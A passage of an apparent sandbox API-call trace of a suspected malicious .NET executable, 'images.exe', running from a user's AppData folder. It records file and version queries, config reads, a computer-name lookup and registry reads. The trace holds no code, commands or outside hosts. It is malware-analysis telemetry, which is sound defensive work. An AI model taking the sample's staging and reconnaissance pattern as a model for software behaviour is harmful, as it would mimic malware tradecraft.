lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", nBufferLength=0x105, lpBuffer=0x52e794, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpFilePart=0x0) returned 0x38 [0178.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52ebf4) returned 1 [0178.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe"), fInfoLevelId=0x0, lpFileInformation=0x52ec70 | out: lpFileInformation=0x52ec70*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb627c790, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0xb627c790, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x127e2500, ftLastWriteTime.dwHighDateTime=0x1d6a090, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0178.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52ebf0) returned 1 [0178.126] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", lpdwHandle=0x52ece4 | out: lpdwHandle=0x52ece4) returned 0x6ac [0178.126] GetFileVersionInfoW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x2289b7c | out: lpData=0x2289b7c) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x52ecb8, puLen=0x52ecb4 | out: lplpBuffer=0x52ecb8*=0x2289c18, puLen=0x52ecb4) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289cb8, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289ce8, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289d1c, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289d50, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289d84, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289e18, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289e48, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289e80, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289c70, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x2289de0, puLen=0x52ec34) returned 1 [0178.126] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x0, puLen=0x52ec34) returned 0 [0178.127] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x52ec38, puLen=0x52ec34 | out: lplpBuffer=0x52ec38*=0x0, puLen=0x52ec34) returned 0 [0178.127] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x52ec2c, puLen=0x52ec28 | out: lplpBuffer=0x52ec2c*=0x2289c18, puLen=0x52ec28) returned 1 [0178.127] VerLanguageNameW (in: wLang=0x0, szLang=0x52e9bc, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0178.127] VerQueryValueW (in: pBlock=0x2289b7c, lpSubBlock="\\", lplpBuffer=0x52ec3c, puLen=0x52ec38 | out: lplpBuffer=0x52ec3c*=0x2289ba4, puLen=0x52ec38) returned 1 [0178.128] CoTaskMemAlloc (cb=0x20c) returned 0x3acdb0 [0178.128] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x3acdb0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x0 [0178.128] CoTaskMemFree (pv=0x3acdb0) [0178.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", nBufferLength=0x105, lpBuffer=0x52e75c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming", lpFilePart=0x0) returned 0x2d [0178.128] CoTaskMemAlloc (cb=0x20c) returned 0x3acdb0 [0178.128] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3acdb0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0178.128] CoTaskMemFree (pv=0x3acdb0) [0178.128] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x52e75c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpFilePart=0x0) returned 0x2b [0178.129] GetCurrentProcess () returned 0xffffffff [0178.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ebf4 | out: TokenHandle=0x52ebf4*=0x294) returned 1 [0178.129] GetCurrentProcess () returned 0xffffffff [0178.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ebf4 | out: TokenHandle=0x52ebf4*=0x298) returned 1 [0178.129] GetCurrentProcess () returned 0xffffffff [0178.129] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52eac0 | out: TokenHandle=0x52eac0*=0x29c) returned 1 [0178.129] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x52eac0 | out: lpFileInformation=0x52eac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.130] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x52e56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7e [0178.130] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x52eac0 | out: lpFileInformation=0x52eac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.130] GetCurrentProcess () returned 0xffffffff [0178.130] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ebf4 | out: TokenHandle=0x52ebf4*=0x2a0) returned 1 [0178.130] GetCurrentProcess () returned 0xffffffff [0178.131] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52eac0 | out: TokenHandle=0x52eac0*=0x2a4) returned 1 [0178.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x52eac0 | out: lpFileInformation=0x52eac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.131] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x52e56c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7c [0178.131] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x52eac0 | out: lpFileInformation=0x52eac0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.132] GetCurrentProcess () returned 0xffffffff [0178.132] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ecd4 | out: TokenHandle=0x52ecd4*=0x2a8) returned 1 [0178.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52e780, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.132] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, lpFileInformation=0x52ecd4 | out: lpFileInformation=0x52ecd4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc0cc4300, ftCreationTime.dwHighDateTime=0x1cd5cf4, ftLastAccessTime.dwLowDateTime=0xcf7ee640, ftLastAccessTime.dwHighDateTime=0x1d2e675, ftLastWriteTime.dwLowDateTime=0xc0cc4300, ftLastWriteTime.dwHighDateTime=0x1cd5cf4, nFileSizeHigh=0x0, nFileSizeLow=0x8c8f)) returned 1 [0178.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", nBufferLength=0x105, lpBuffer=0x52e70c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config", lpFilePart=0x0) returned 0x43 [0178.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x52ec00) returned 1 [0178.132] CreateFileW (lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2ac [0178.132] GetFileType (hFile=0x2ac) returned 0x1 [0178.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x52ebfc) returned 1 [0178.133] GetFileType (hFile=0x2ac) returned 0x1 [0178.133] GetFileSize (in: hFile=0x2ac, lpFileSizeHigh=0x52ecc8 | out: lpFileSizeHigh=0x52ecc8*=0x0) returned 0x8c8f [0178.133] ReadFile (in: hFile=0x2ac, lpBuffer=0x2290744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52ec84, lpOverlapped=0x0 | out: lpBuffer=0x2290744*, lpNumberOfBytesRead=0x52ec84*=0x1000, lpOverlapped=0x0) returned 1 [0178.133] ReadFile (in: hFile=0x2ac, lpBuffer=0x2290744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52eb20, lpOverlapped=0x0 | out: lpBuffer=0x2290744*, lpNumberOfBytesRead=0x52eb20*=0x1000, lpOverlapped=0x0) returned 1 [0178.133] ReadFile (in: hFile=0x2ac, lpBuffer=0x2290744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2290744*, lpNumberOfBytesRead=0x52e9d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.134] ReadFile (in: hFile=0x2ac, lpBuffer=0x2290744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2290744*, lpNumberOfBytesRead=0x52e9d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.134] ReadFile (in: hFile=0x2ac, lpBuffer=0x2290744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e9d4, lpOverlapped=0x0 | out: lpBuffer=0x2290744*, lpNumberOfBytesRead=0x52e9d4*=0x1000, lpOverlapped=0x0) returned 1 [0178.134] ReadFile (in: hFile=0x2ac, lpBuffer=0x2290744, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x52e90c, lpOverlapped=0x0 | out: lpBuffer=0x2290744*, lpNumberOfBytesRead=0x52e90c*=0x1000, lpOverlapped=0x0) returned 1 [0178.134] CloseHandle (hObject=0x2ac) returned 1 [0178.134] GetCurrentProcess () returned 0xffffffff [0178.134] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ec90 | out: TokenHandle=0x52ec90*=0x2ac) returned 1 [0178.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", nBufferLength=0x105, lpBuffer=0x52e73c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config", lpFilePart=0x0) returned 0x3f [0178.135] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\images.exe.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\images.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x52ec90 | out: lpFileInformation=0x52ec90*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.135] GetCurrentProcess () returned 0xffffffff [0178.135] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ec4c | out: TokenHandle=0x52ec4c*=0x2b0) returned 1 [0178.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x52e6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7e [0178.136] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\ut族的z行rx的h氏i\\images.exe_url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x52ec4c | out: lpFileInformation=0x52ec4c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.136] GetCurrentProcess () returned 0xffffffff [0178.136] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ec08 | out: TokenHandle=0x52ec08*=0x2b4) returned 1 [0178.136] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", nBufferLength=0x105, lpBuffer=0x52e6b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config", lpFilePart=0x0) returned 0x7c [0178.136] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Ut族的z行RX的h氏i\\images.exe_Url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\ut族的z行rx的h氏i\\images.exe_url_v52zdyq4zjgafwcwfazlwkurkeqjdgxc\\0.0.0.0\\user.config"), fInfoLevelId=0x0, lpFileInformation=0x52ec08 | out: lpFileInformation=0x52ec08*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0178.146] GetCurrentProcess () returned 0xffffffff [0178.146] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52eab8 | out: TokenHandle=0x52eab8*=0x2b8) returned 1 [0178.152] GetCurrentProcess () returned 0xffffffff [0178.153] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52e9f8 | out: TokenHandle=0x52e9f8*=0x2bc) returned 1 [0178.159] GetCurrentProcess () returned 0xffffffff [0178.159] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x52ea40 | out: TokenHandle=0x52ea40*=0x2c0) returned 1 [0178.291] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x390bd8 [0178.305] GetCurrentProcessId () returned 0x718 [0178.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x52e278, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0178.309] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", nBufferLength=0x105, lpBuffer=0x52e1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\System.Data\\v4.0_4.0.0.0__b77a5c561934e089\\System.Data.dll", lpFilePart=0x0) returned 0x63 [0178.315] CoTaskMemAlloc (cb=0x32) returned 0x382a28 [0178.315] CoTaskMemAlloc (cb=0xc8) returned 0x3ac698 [0178.316] CoTaskMemFree (pv=0x382a28) [0178.316] CoTaskMemFree (pv=0x3ac698) [0178.443] GetComputerNameW (in: lpBuffer=0x52d63c, nSize=0x22c1b30 | out: lpBuffer="XDUWTFONO", nSize=0x22c1b30) returned 1 [0178.447] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.NET Data Provider for SqlServer\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d874 | out: phkResult=0x52d874*=0x2c4) returned 0x0 [0178.448] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x52d888, lpData=0x0, lpcbData=0x52d884*=0x0 | out: lpType=0x52d888*=0x1, lpData=0x0, lpcbData=0x52d884*=0x1c) returned 0x0 [0178.448] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Library", lpReserved=0x0, lpType=0x52d888, lpData=0x22c27bc, lpcbData=0x52d884*=0x1c | out: lpType=0x52d888*=0x1, lpData="netfxperf.dll", lpcbData=0x52d884*=0x1c) returned 0x0 [0178.448] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x52d894, lpData=0x0, lpcbData=0x52d890*=0x0 | out: lpType=0x52d894*=0x4, lpData=0x0, lpcbData=0x52d890*=0x4) returned 0x0 [0178.448] RegQueryValueExW (in: hKey=0x2c4, lpValueName="IsMultiInstance", lpReserved=0x0, lpType=0x52d894, lpData=0x52d880, lpcbData=0x52d890*=0x4 | out: lpType=0x52d894*=0x4, lpData=0x52d880*=0x1, lpcbData=0x52d890*=0x4) returned 0x0 [0178.448] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x52d894, lpData=0x0, lpcbData=0x52d890*=0x0 | out: lpType=0x52d894*=0x4, lpData=0x0, lpcbData=0x52d890*=0x4) returned 0x0 [0178.449] RegQueryValueExW (in: hKey=0x2c4, lpValueName="First Counter", lpReserved=0x0, lpType=0x52d894, lpData=0x52d880, lpcbData=0x52d890*=0x4 | out: lpType=0x52d894*=0x4, lpData=0x52d880*=0x1386, lpcbData=0x52d890*=0x4) returned 0x0 [0178.449] RegCloseKey (hKey=0x2c4) returned 0x0 [0178.452] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\.net data provider for sqlserver\\Performance", ulOptions=0x0, samDesired=0x20019, phkResult=0x52d86c | out: phkResult=0x52d86c*=0x2c4) returned 0x0 [0178.452] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x52d88c, lpData=0x0, lpcbData=0x52d888*=0x0 | out: lpType=0x52d88c*=0x4, lpData=0x0, lpcbData=0x52d888*=0x4) returned 0x0 [0178.452] RegQueryValueExW (in: hKey=0x2c4, lpValueName="CategoryOptions", lpReserved=0x0, lpType=0x52d88c, lpData=0x52d878, lpcbData=0x52d888*=0x4 | out: lpType=0x52d88c*=0x4, lpData=0x52d878*=0x3, lpcbData=0x52d888*=0x4) returned 0x0 [0178.452] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x52d88c, lpData=0x0, lpcbData=0x52d888*=0x0 | out: lpType=0x52d88c*=0x4, lpData=0x0, lpcbData=0x52d888*=0x4) returned 0x0 [0178.452] RegQueryValueExW (in: hKey=0x2c4, lpValueName="FileMappingSize", lpReserved=0x0, lpType=0x52d88c, lpData=0x52d878, lpcbData=0x52d888*=0x4 | out: lpType=0x52d88c*=0x4, lpData=0x52d878*=0x20000, lpcbData=0x52d888*=0x4) returned 0x0 [0178.452] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x52d88c, lpData=0x0, lpcbData=0x52d888*=0x0 | out: lpType=0x52d88c*=0x3, lpData=0x0, lpcbData=0x52d888*=0x30a) returned 0x0 [0178.452] RegQueryValueExW (in: hKey=0x2c4, lpValueName="Counter Names", lpReserved=0x0, lpType=0x52d88c, lpData=0x22c30a8, lpcbData=0x52d888*=0x30a | out: lpType=0x52d88c*=0x3, lpData=0x22c30a8*, lpcbData=0x52d888*=0x30a) returned 0x0 [0178.454] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0178.457] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x52d7c8, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x20000, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x0 [0178.458] OpenFileMappingW (dwDesiredAccess=0x2, bInheritHandle=0, lpName="Global\\netfxcustomperfcounters.1.0.net data provider for sqlserver") returned 0x2c8 [0178.458] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1e50000 [0178.459] VirtualQuery (in: lpAddress=0x1e50000, lpBuffer=0x52d86c, dwLength=0x1c | out: lpBuffer=0x52d86c*(BaseAddress=0x1e50000, AllocationBase=0x1e50000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x40000)) returned 0x1c [0178.459] LocalFree (hMem=0x39dfe0) returned 0x0 [0178.459] RegCloseKey (hKey=0x2c4) returned 0x0 [0178.463] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x22c45d4, cbSid=0x52d848 | out: pSid=0x22c45d4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), 